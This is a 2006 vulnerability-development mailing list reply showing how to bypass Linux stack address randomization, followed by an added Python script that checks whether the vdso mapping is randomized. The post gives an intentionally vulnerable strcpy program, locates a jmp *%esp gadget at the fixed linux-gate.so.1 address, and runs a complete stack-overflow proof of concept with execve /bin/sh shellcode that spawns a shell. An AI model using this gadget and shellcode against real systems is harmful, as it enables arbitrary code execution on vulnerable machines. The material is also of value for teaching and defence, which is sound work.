Vulnerability Development mailing list archives

Re: Beating memory address randomization (security) features in Unix/Linux


From: xgc () gotfault net
Date: 29 Mar 2006 20:02:38 -0000

To bypass VA Space Randomization on Linux:

[~/tmp] $ more stack.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
        char buf[256];
        strcpy(buf, argv[1]);
        return 1;
}
[~/tmp] $ gcc -o stack stack.c
[~/tmp] $ ldd stack
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7e32000)
        /lib/ld-linux.so.2 (0xb7f70000)
[~/tmp] $ ldd stack
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/libc.so.6 (0xb7e72000)
        /lib/ld-linux.so.2 (0xb7fb0000)
[~/tmp] $

As you can see, linux-gate.so.1 is linked into the stack program and its address isn't randomized.

In this address range there are a lot of instructions, mainly JMP *%ESP, which can be used to point to the stack and execute
arbitrary code.

[~/tmp] $ gdb ./stack -q
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x80483a1
(gdb) run
Starting program: /home/xgc/tmp/stack

Breakpoint 1, 0x080483a1 in main ()
(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb)

A proof of concept is shown below:

[~/tmp] $ !gdb
gdb ./stack -q
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) x/i main+3
0x804839b <main+3>:     sub    $0x108,%esp
(gdb) printf "%d\n", 0x108
264
(gdb) run `perl -e 'print "A"x260,"BBBB"'`
Starting program: /home/xgc/tmp/stack `perl -e 'print "A"x260,"BBBB"'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb) run `perl -e 'print 
"A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/xgc/tmp/stack `perl -e 'print 
"A"x260,"\x5f\xe7\xff\xff","\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
sh-3.1$ uname -na
Linux localhost 2.6.12.5-vs2.0 #1 SMP Tue Aug 23 16:21:23 CEST 2005 i686 GNU/Linux
sh-3.1$

At EIP we set the address which jumps to ESP. It then looks at the next instructions, where the shellcode is.

"Does anyone know if there are any articles related to this on the web?"

Yes, there is a paper from izik at: http://www.tty64.org/doc/smackthestack.txt

- dx
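The fixed linux-gate.so.1 base the post relies on is something an administrator can audit on their own kernel, since later kernels randomize the [vdso] mapping as well. The check below is an added example, not part of dx's post; it assumes a Linux /proc filesystem, spawns a few child interpreters that each read their own /proc/self/maps, and reports whether the vdso base moves between runs (the maps sample in the code is constructed in the style of the post's kernel).

```python
import re
import subprocess
import sys

# Constructed sample of /proc/PID/maps output in the style of the kernel in
# the post: libraries move between runs, but [vdso] sits at 0xffffe000.
SAMPLE_MAPS_FIXED = """\
08048000-08049000 r-xp 00000000 03:01 123456     /home/user/tmp/stack
b7e32000-b7f5a000 r-xp 00000000 03:01 654321     /lib/tls/libc.so.6
bffeb000-c0000000 rw-p 00000000 00:00 0          [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
"""

# start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+\S+\s+\S+\s+\S+\s*(.*)$")


def vdso_base(maps_text):
    """Return the start address of the [vdso] mapping, or None if absent."""
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if m and m.group(4).strip() == "[vdso]":
            return int(m.group(1), 16)
    return None


def is_randomized(bases):
    """True only if at least two distinct vdso bases were observed."""
    observed = {b for b in bases if b is not None}
    return len(observed) > 1


def sample_vdso_bases(runs=5):
    """Spawn `runs` fresh interpreters; each child reads its own
    /proc/self/maps, so no ptrace or debugger is needed (Linux only)."""
    bases = []
    for _ in range(runs):
        out = subprocess.run(
            [sys.executable, "-c", "print(open('/proc/self/maps').read())"],
            capture_output=True, text=True, check=True).stdout
        bases.append(vdso_base(out))
    return bases


if __name__ == "__main__":
    bases = sample_vdso_bases()
    for b in bases:
        print("vdso base: %s" % (hex(b) if b is not None else "not mapped"))
    print("vdso randomized:", is_randomized(bases))
```

A result of False across several runs means every process in the sample got the same vdso base, which is the condition the post's jmp *%esp trick depends on.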

